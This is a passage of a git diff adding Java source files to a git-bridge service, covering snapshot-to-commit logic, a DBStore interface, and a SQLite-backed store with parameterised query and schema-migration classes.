GitUserException { + String projectName = repo.getProjectName(); + int latestVersionId = dbStore.getLatestVersionForProject(projectName); + Deque<Snapshot> snapshots = snapshotAPI.getSnapshots(oauth2, projectName, latestVersionId); + + makeCommitsFromSnapshots(repo, snapshots); + + // TODO: in case crashes around here, add an + // "updating_from_commit" column to the DB as a way to rollback the + // any failed partial updates before re-trying + // Also need to consider the empty state (a new git init'd repo being + // the rollback target) + if (!snapshots.isEmpty()) { + dbStore.setLatestVersionForProject(projectName, snapshots.getLast().getVersionID()); + } + } + + /* + * Called by {@link #updateProject(Optional, ProjectRepo)}. + * + * Performs the actual Git commits on the disk. + * + * Each commit adds files to the db store + * ({@link ResourceCache#get(String, String, String, Map, Map, Optional)}, + * and then removes any files that were deleted. + * @param repo The repository to commit to + * @param snapshots The snapshots to commit + * @throws IOException If an IOException occurred + * @throws SizeLimitExceededException If one of the files was too big. + */ + private void makeCommitsFromSnapshots(ProjectRepo repo, Collection<Snapshot> snapshots) + throws IOException, GitUserException { + String name = repo.getProjectName(); + Optional<Long> maxSize = config.getRepoStore().flatMap(RepoStoreConfig::getMaxFileSize); + for (Snapshot snapshot : snapshots) { + RawDirectory directory = repo.getDirectory(); + Map<String, RawFile> fileTable = directory.getFileTable(); + List<RawFile> files = new ArrayList<>(); + files.addAll(snapshot.getSrcs()); + for (RawFile file : files) { + long size = file.size(); + /* Can't throw in ifPresent... */ + if (maxSize.isPresent()) { + long maxSize_ = maxSize.get(); + if (size >= maxSize_) { + throw new SizeLimitExceededException(Optional.of(file.getPath()), size, maxSize_); + } + } + } + Map<String, byte[]> fetchedUrls = new HashMap<>(); + for (SnapshotAttachment snapshotAttachment : snapshot.getAtts()) { + files.add( + resourceCache.get( + name, + snapshotAttachment.getUrl(), + snapshotAttachment.getPath(), + fileTable, + fetchedUrls, + maxSize)); + } + Log.debug("[{}] Committing version ID: {}", name, snapshot.getVersionID()); + Collection<String> missingFiles = + repo.commitAndGetMissing( + new GitDirectoryContents(files, repoStore.getRootDirectory(), name, snapshot)); + dbStore.deleteFilesForProject(name, missingFiles.toArray(new String[missingFiles.size()])); + } + } + + /* + * Called by + * {@link #pushCritical(Optional, String, RawDirectory, RawDirectory)}. + * + * This call consists of 2 things: Creating the candidate snapshot, + * and writing the atts to the atts directory. + * + * The candidate snapshot RAIIs away those atts (use try-with-resources). + * @param projectName The name of the project + * @param directoryContents The new directory contents + * @param oldDirectoryContents The old directory contents + * @return The {@link CandidateSnapshot} created + * @throws IOException If an I/O exception occurred on writing + */ + private CandidateSnapshot createCandidateSnapshot( + String projectName, RawDirectory directoryContents, RawDirectory oldDirectoryContents) + throws IOException { + CandidateSnapshot candidateSnapshot = + new CandidateSnapshot( + projectName, + dbStore.getLatestVersionForProject(projectName), + directoryContents, + oldDirectoryContents); + candidateSnapshot.writeServletFiles(repoStore.getRootDirectory()); + return candidateSnapshot; + } + + /* + * Called by + * {@link #pushCritical(Optional, String, RawDirectory, RawDirectory)}. + * + * This method approves a push by setting the latest version and removing + * any deleted files from the db store (files were already added by the + * resources cache). + * @param versionID + * @param candidateSnapshot + */ + private void approveSnapshot(int versionID, CandidateSnapshot candidateSnapshot) { + List<String> deleted = candidateSnapshot.getDeleted(); + dbStore.setLatestVersionForProject(candidateSnapshot.getProjectName(), versionID); + dbStore.deleteFilesForProject( + candidateSnapshot.getProjectName(), deleted.toArray(new String[deleted.size()])); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/DBInitException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/DBInitException.java new file mode 100644 index 0000000..633ae51 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/DBInitException.java @@ -0,0 +1,19 @@ +package uk.ac.ic.wlgitbridge.bridge.db; + +/* + * Created by winston on 23/08/2016. + */ +public class DBInitException extends RuntimeException { + + public DBInitException(String message) { + super(message); + } + + public DBInitException(String message, Throwable cause) { + super(message, cause); + } + + public DBInitException(Throwable cause) { + super(cause); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/DBStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/DBStore.java new file mode 100644 index 0000000..01f3777 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/DBStore.java @@ -0,0 +1,48 @@ +package uk.ac.ic.wlgitbridge.bridge.db; + +import java.sql.Timestamp; +import java.util.List; + +/* + * Created by winston on 20/08/2016. + */ +public interface DBStore { + + int getNumProjects(); + + List<String> getProjectNames(); + + void setLatestVersionForProject(String project, int versionID); + + int getLatestVersionForProject(String project); + + void addURLIndexForProject(String projectName, String url, String path); + + void deleteFilesForProject(String project, String... files); + + String getPathForURLInProject(String projectName, String url); + + String getOldestUnswappedProject(); + + void swap(String projectName, String compressionMethod); + + void restore(String projectName); + + String getSwapCompression(String projectName); + + int getNumUnswappedProjects(); + + ProjectState getProjectState(String projectName); + + /* + * Sets the last accessed time for the given project name. + * @param projectName the project's name + * @param time the time, or null if the project is to be swapped + */ + void setLastAccessedTime(String projectName, Timestamp time); + + /* + * Delete the metadata associated with the given project. + */ + void deleteProject(String projectName); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/ProjectState.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/ProjectState.java new file mode 100644 index 0000000..3e85116 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/ProjectState.java @@ -0,0 +1,10 @@ +package uk.ac.ic.wlgitbridge.bridge.db; + +/* + * Created by winston on 24/08/2016. + */ +public enum ProjectState { + NOT_PRESENT, + PRESENT, + SWAPPED +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/noop/NoopDbStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/noop/NoopDbStore.java new file mode 100644 index 0000000..20d4202 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/noop/NoopDbStore.java @@ -0,0 +1,70 @@ +package uk.ac.ic.wlgitbridge.bridge.db.noop; + +import java.sql.Timestamp; +import java.util.List; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.db.ProjectState; + +public class NoopDbStore implements DBStore { + + @Override + public int getNumProjects() { + return 0; + } + + @Override + public List<String> getProjectNames() { + return null; + } + + @Override + public void setLatestVersionForProject(String project, int versionID) {} + + @Override + public int getLatestVersionForProject(String project) { + return 0; + } + + @Override + public void addURLIndexForProject(String projectName, String url, String path) {} + + @Override + public void deleteFilesForProject(String project, String... files) {} + + @Override + public String getPathForURLInProject(String projectName, String url) { + return null; + } + + @Override + public String getOldestUnswappedProject() { + return null; + } + + @Override + public int getNumUnswappedProjects() { + return 0; + } + + @Override + public ProjectState getProjectState(String projectName) { + return null; + } + + @Override + public void setLastAccessedTime(String projectName, Timestamp time) {} + + @Override + public void swap(String projectName, String compressionMethod) {} + + @Override + public void restore(String projectName) {} + + @Override + public String getSwapCompression(String projectName) { + return null; + } + + @Override + public void deleteProject(String projectName) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SQLQuery.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SQLQuery.java new file mode 100644 index 0000000..faa6a3f --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SQLQuery.java @@ -0,0 +1,12 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite; + +import java.sql.ResultSet; +import java.sql.SQLException; + +/* + * Created by Winston on 20/11/14. + */ +public interface SQLQuery<T> extends SQLUpdate { + + public T processResultSet(ResultSet resultSet) throws SQLException; +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SQLUpdate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SQLUpdate.java new file mode 100644 index 0000000..9e79fdc --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SQLUpdate.java @@ -0,0 +1,14 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite; + +import java.sql.PreparedStatement; +import java.sql.SQLException; + +/* + * Created by Winston on 20/11/14. + */ +public interface SQLUpdate { + + String getSQL(); + + default void addParametersToStatement(PreparedStatement statement) throws SQLException {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SqliteDBStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SqliteDBStore.java new file mode 100644 index 0000000..6647a59 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/SqliteDBStore.java @@ -0,0 +1,227 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite; + +import com.google.common.base.Preconditions; +import java.io.File; +import java.sql.*; +import java.util.List; +import java.util.stream.Stream; +import uk.ac.ic.wlgitbridge.bridge.db.DBInitException; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.db.ProjectState; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.query.*; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.alter.*; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.create.*; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.delete.*; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.insert.*; + +/* + * Created by Winston on 17/11/14. + */ +public class SqliteDBStore implements DBStore { + + private final Connection connection; + private int heapLimitBytes = 0; + + public SqliteDBStore(File dbFile) { + this(dbFile, 0); + } + + public SqliteDBStore(File dbFile, int heapLimitBytes) { + this.heapLimitBytes = heapLimitBytes; + try { + connection = openConnectionTo(dbFile); + createTables(); + } catch (Throwable t) { + throw new DBInitException(t); + } + } + + @Override + public int getNumProjects() { + return query(new GetNumProjects()); + } + + @Override + public List<String> getProjectNames() { + return query(new GetProjectNamesSQLQuery()); + } + + @Override + public void setLatestVersionForProject(String projectName, int versionID) { + update(new SetProjectSQLUpdate(projectName, versionID)); + } + + @Override + public int getLatestVersionForProject(String projectName) { + return query(new GetLatestVersionForProjectSQLQuery(projectName)); + } + + @Override + public void addURLIndexForProject(String projectName, String url, String path) { + update(new AddURLIndexSQLUpdate(projectName, url, path)); + } + + @Override + public void deleteFilesForProject(String projectName, String... paths) { + update(new DeleteFilesForProjectSQLUpdate(projectName, paths)); + } + + @Override + public String getPathForURLInProject(String projectName, String url) { + return query(new GetPathForURLInProjectSQLQuery(projectName, url)); + } + + @Override + public String getOldestUnswappedProject() { + return query(new GetOldestProjectName()); + } + + @Override + public int getNumUnswappedProjects() { + return query(new GetNumUnswappedProjects()); + } + + @Override + public ProjectState getProjectState(String projectName) { + return query(new GetProjectState(projectName)); + } + + @Override + public void setLastAccessedTime(String projectName, Timestamp lastAccessed) { + update(new SetProjectLastAccessedTime(projectName, lastAccessed)); + } + + @Override + public void swap(String projectName, String compressionMethod) { + update(new UpdateSwap(projectName, compressionMethod)); + } + + @Override + public void restore(String projectName) { + update(new UpdateRestore(projectName)); + } + + @Override + public String getSwapCompression(String projectName) { + return query(new GetSwapCompression(projectName)); + } + + @Override + public void deleteProject(String projectName) { + update(new DeleteAllFilesInProjectSQLUpdate(projectName)); + update(new DeleteProjectSQLUpdate(projectName)); + } + + private Connection openConnectionTo(File dbFile) { + File parentDir = dbFile.getParentFile(); + if (!parentDir.exists() && !parentDir.mkdirs()) { + throw new DBInitException( + parentDir.getAbsolutePath() + + " directory didn't exist, " + + "and unable to create. Check your permissions."); + } + try { + Class.forName("org.sqlite.JDBC"); + } catch (ClassNotFoundException e) { + throw new DBInitException(e); + } + try { + return DriverManager.getConnection("jdbc:sqlite:" + dbFile.getAbsolutePath()); + } catch (SQLException e) { + throw new DBInitException("Unable to connect to DB", e); + } + } + + private void createTables() { + /* Migrations */ + /* We need to eat exceptions from here */ + try { + doUpdate(new SetSoftHeapLimitPragma(this.heapLimitBytes)); + } catch (SQLException ignore) { + } + try { + doUpdate(new ProjectsAddLastAccessed()); + } catch (SQLException ignore) { + } + try { + doUpdate(new ProjectsAddSwapTime()); + } catch (SQLException ignore) { + } + try { + doUpdate(new ProjectsAddRestoreTime()); + } catch (SQLException ignore) { + } + try { + doUpdate(new ProjectsAddSwapCompression()); + } catch (SQLException ignore) { + } + + /* Create tables (if they don't exist) */ + Stream.of( + new CreateProjectsTableSQLUpdate(), + new CreateProjectsIndexLastAccessed(), + new CreateURLIndexStoreSQLUpdate(), + new CreateIndexURLIndexStore()) + .forEach(this::update); + + /* In the case of needing to change the schema, we need to check that + migrations didn't just fail */ + Preconditions.checkState(query(new LastAccessedColumnExists())); + Preconditions.checkState(query(new SwapTimeColumnExists())); + Preconditions.checkState(query(new RestoreTimeColumnExists())); + Preconditions.checkState(query(new SwapCompressionColumnExists())); + } + + private void update(SQLUpdate update) { + try { + doUpdate(update); + } catch (SQLException e) { + throw new RuntimeException(e); + } + } + + private <T> T query(SQLQuery<T> query) { + try { + return doQuery(query); + } catch (SQLException e) { + throw new RuntimeException(e); + } + } + + private void doUpdate(SQLUpdate update) throws SQLException { + PreparedStatement statement = null; + try { + statement = connection.prepareStatement(update.getSQL()); + update.addParametersToStatement(statement); + statement.executeUpdate(); + } catch (SQLException e) { + throw e; + } finally { + try { + statement.close(); + } catch (Throwable t) { + throw new SQLException(t); + } + } + } + + private <T> T doQuery(SQLQuery<T> query) throws SQLException { + PreparedStatement statement = null; + ResultSet results = null; + try { + statement = connection.prepareStatement(query.getSQL()); + query.addParametersToStatement(statement); + results = statement.executeQuery(); + return query.processResultSet(results); + } catch (SQLException e) { + throw e; + } finally { + if (statement != null) { + statement.close(); + } + if (results != null) { + results.close(); + } + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetLatestVersionForProjectSQLQuery.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetLatestVersionForProjectSQLQuery.java new file mode 100644 index 0000000..cc74e77 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetLatestVersionForProjectSQLQuery.java @@ -0,0 +1,40 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.PreparedStatement; +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +/* + * Created by Winston on 20/11/14. + */ +public class GetLatestVersionForProjectSQLQuery implements SQLQuery<Integer> { + + private static final String GET_VERSION_IDS_FOR_PROJECT_NAME = + "SELECT `version_id` FROM `projects` WHERE `name` = ?"; + + private final String projectName; + + public GetLatestVersionForProjectSQLQuery(String projectName) { + this.projectName = projectName; + } + + @Override + public Integer processResultSet(ResultSet resultSet) throws SQLException { + int versionID = 0; + while (resultSet.next()) { + versionID = resultSet.getInt("version_id"); + } + return versionID; + } + + @Override + public String getSQL() { + return GET_VERSION_IDS_FOR_PROJECT_NAME; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetNumProjects.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetNumProjects.java new file mode 100644 index 0000000..30e00be --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetNumProjects.java @@ -0,0 +1,26 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +/* + * Created by winston on 24/08/2016. + */ +public class GetNumProjects implements SQLQuery<Integer> { + + private static final String GET_NUM_PROJECTS = "SELECT COUNT(*)\n" + " FROM `projects`"; + + @Override + public String getSQL() { + return GET_NUM_PROJECTS; + } + + @Override + public Integer processResultSet(ResultSet resultSet) throws SQLException { + while (resultSet.next()) { + return resultSet.getInt("COUNT(*)"); + } + throw new IllegalStateException("Count always returns results"); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetNumUnswappedProjects.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetNumUnswappedProjects.java new file mode 100644 index 0000000..512f15c --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetNumUnswappedProjects.java @@ -0,0 +1,27 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +/* + * Created by winston on 24/08/2016. + */ +public class GetNumUnswappedProjects implements SQLQuery<Integer> { + + private static final String GET_NUM_UNSWAPPED_PROJECTS = + "SELECT COUNT(*)\n" + " FROM `projects`\n" + " WHERE `last_accessed` IS NOT NULL"; + + @Override + public String getSQL() { + return GET_NUM_UNSWAPPED_PROJECTS; + } + + @Override + public Integer processResultSet(ResultSet resultSet) throws SQLException { + while (resultSet.next()) { + return resultSet.getInt("COUNT(*)"); + } + throw new IllegalStateException("Count always returns results"); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetOldestProjectName.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetOldestProjectName.java new file mode 100644 index 0000000..3518977 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetOldestProjectName.java @@ -0,0 +1,29 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +/* + * Created by winston on 23/08/2016. + */ +public class GetOldestProjectName implements SQLQuery<String> { + + private static final String GET_OLDEST_PROJECT_NAME = + "SELECT `name`, MIN(`last_accessed`)\n" + + " FROM `projects` \n" + + " WHERE `last_accessed` IS NOT NULL;"; + + @Override + public String getSQL() { + return GET_OLDEST_PROJECT_NAME; + } + + @Override + public String processResultSet(ResultSet resultSet) throws SQLException { + while (resultSet.next()) { + return resultSet.getString("name"); + } + return null; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetPathForURLInProjectSQLQuery.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetPathForURLInProjectSQLQuery.java new file mode 100644 index 0000000..25beb18 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetPathForURLInProjectSQLQuery.java @@ -0,0 +1,43 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.PreparedStatement; +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +/* + * Created by Winston on 20/11/14. + */ +public class GetPathForURLInProjectSQLQuery implements SQLQuery<String> { + + private static final String GET_URL_INDEXES_FOR_PROJECT_NAME = + "SELECT `path` " + "FROM `url_index_store` " + "WHERE `project_name` = ? " + "AND `url` = ?"; + + private final String projectName; + private final String url; + + public GetPathForURLInProjectSQLQuery(String projectName, String url) { + this.projectName = projectName; + this.url = url; + } + + @Override + public String processResultSet(ResultSet resultSet) throws SQLException { + String path = null; + while (resultSet.next()) { + path = resultSet.getString("path"); + } + return path; + } + + @Override + public String getSQL() { + return GET_URL_INDEXES_FOR_PROJECT_NAME; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + statement.setString(2, url); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetProjectNamesSQLQuery.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetProjectNamesSQLQuery.java new file mode 100644 index 0000000..d56ad5c --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetProjectNamesSQLQuery.java @@ -0,0 +1,29 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.ResultSet; +import java.sql.SQLException; +import java.util.ArrayList; +import java.util.List; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +/* + * Created by Winston on 21/02/15. + */ +public class GetProjectNamesSQLQuery implements SQLQuery<List<String>> { + + private static final String GET_URL_INDEXES_FOR_PROJECT_NAME = "SELECT `name` FROM `projects`"; + + @Override + public List<String> processResultSet(ResultSet resultSet) throws SQLException { + List<String> projectNames = new ArrayList<>(); + while (resultSet.next()) { + projectNames.add(resultSet.getString("name")); + } + return projectNames; + } + + @Override + public String getSQL() { + return GET_URL_INDEXES_FOR_PROJECT_NAME; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetProjectState.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetProjectState.java new file mode 100644 index 0000000..a291695 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetProjectState.java @@ -0,0 +1,43 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.PreparedStatement; +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.ProjectState; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +/* + * Created by winston on 24/08/2016. + */ +public class GetProjectState implements SQLQuery<ProjectState> { + + private static final String GET_PROJECT_STATE = + "SELECT `last_accessed`\n" + " FROM `projects`\n" + " WHERE `name` = ?"; + + private final String projectName; + + public GetProjectState(String projectName) { + this.projectName = projectName; + } + + @Override + public String getSQL() { + return GET_PROJECT_STATE; + } + + @Override + public ProjectState processResultSet(ResultSet resultSet) throws SQLException { + while (resultSet.next()) { + if (resultSet.getTimestamp("last_accessed") == null) { + return ProjectState.SWAPPED; + } + return ProjectState.PRESENT; + } + return ProjectState.NOT_PRESENT; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetSwapCompression.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetSwapCompression.java new file mode 100644 index 0000000..b21ec3e --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetSwapCompression.java @@ -0,0 +1,36 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.PreparedStatement; +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +public class GetSwapCompression implements SQLQuery<String> { + private static final String GET_SWAP_COMPRESSION = + "SELECT `swap_compression` FROM `projects` WHERE `name` = ?"; + + private final String projectName; + + public GetSwapCompression(String projectName) { + this.projectName = projectName; + } + + @Override + public String processResultSet(ResultSet resultSet) throws SQLException { + String compression = null; + while (resultSet.next()) { + compression = resultSet.getString("swap_compression"); + } + return compression; + } + + @Override + public String getSQL() { + return GET_SWAP_COMPRESSION; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/LastAccessedColumnExists.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/LastAccessedColumnExists.java new file mode 100644 index 0000000..758a47b --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/LastAccessedColumnExists.java @@ -0,0 +1,28 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +/* + * Created by winston on 04/09/2016. + */ +public class LastAccessedColumnExists implements SQLQuery<Boolean> { + + private static final String LAST_ACCESSED_COLUMN_EXISTS = "PRAGMA table_info(`projects`)"; + + @Override + public String getSQL() { + return LAST_ACCESSED_COLUMN_EXISTS; + } + + @Override + public Boolean processResultSet(ResultSet resultSet) throws SQLException { + while (resultSet.next()) { + if (resultSet.getString(2).equals("last_accessed")) { + return true; + } + } + return false; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/RestoreTimeColumnExists.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/RestoreTimeColumnExists.java new file mode 100644 index 0000000..c726bec --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/RestoreTimeColumnExists.java @@ -0,0 +1,24 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +public class RestoreTimeColumnExists implements SQLQuery<Boolean> { + private static final String RESTORE_TIME_COLUMN_EXISTS = "PRAGMA table_info(`projects`)"; + + @Override + public String getSQL() { + return RESTORE_TIME_COLUMN_EXISTS; + } + + @Override + public Boolean processResultSet(ResultSet resultSet) throws SQLException { + while (resultSet.next()) { + if (resultSet.getString(2).equals("restore_time")) { + return true; + } + } + return false; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/SwapCompressionColumnExists.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/SwapCompressionColumnExists.java new file mode 100644 index 0000000..89f083a --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/SwapCompressionColumnExists.java @@ -0,0 +1,24 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +public class SwapCompressionColumnExists implements SQLQuery<Boolean> { + private static final String SWAP_COMPRESSION_COLUMN_EXISTS = "PRAGMA table_info(`projects`)"; + + @Override + public String getSQL() { + return SWAP_COMPRESSION_COLUMN_EXISTS; + } + + @Override + public Boolean processResultSet(ResultSet resultSet) throws SQLException { + while (resultSet.next()) { + if (resultSet.getString(2).equals("swap_compression")) { + return true; + } + } + return false; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/SwapTimeColumnExists.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/SwapTimeColumnExists.java new file mode 100644 index 0000000..7d65e21 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/SwapTimeColumnExists.java @@ -0,0 +1,24 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +public class SwapTimeColumnExists implements SQLQuery<Boolean> { + private static final String SWAP_TIME_COLUMN_EXISTS = "PRAGMA table_info(`projects`)"; + + @Override + public String getSQL() { + return SWAP_TIME_COLUMN_EXISTS; + } + + @Override + public Boolean processResultSet(ResultSet resultSet) throws SQLException { + while (resultSet.next()) { + if (resultSet.getString(2).equals("swap_time")) { + return true; + } + } + return false; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddLastAccessed.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddLastAccessed.java new file mode 100644 index 0000000..31bbadb --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddLastAccessed.java @@ -0,0 +1,17 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.alter; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +/* + * Created by winston on 03/09/2016. + */ +public class ProjectsAddLastAccessed implements SQLUpdate { + + private static final String PROJECTS_ADD_LAST_ACCESSED = + "ALTER TABLE `projects`\n" + "ADD COLUMN `last_accessed` DATETIME NULL DEFAULT 0"; + + @Override + public String getSQL() { + return PROJECTS_ADD_LAST_ACCESSED; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddRestoreTime.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddRestoreTime.java new file mode 100644 index 0000000..d4675db --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddRestoreTime.java @@ -0,0 +1,13 @@ +package 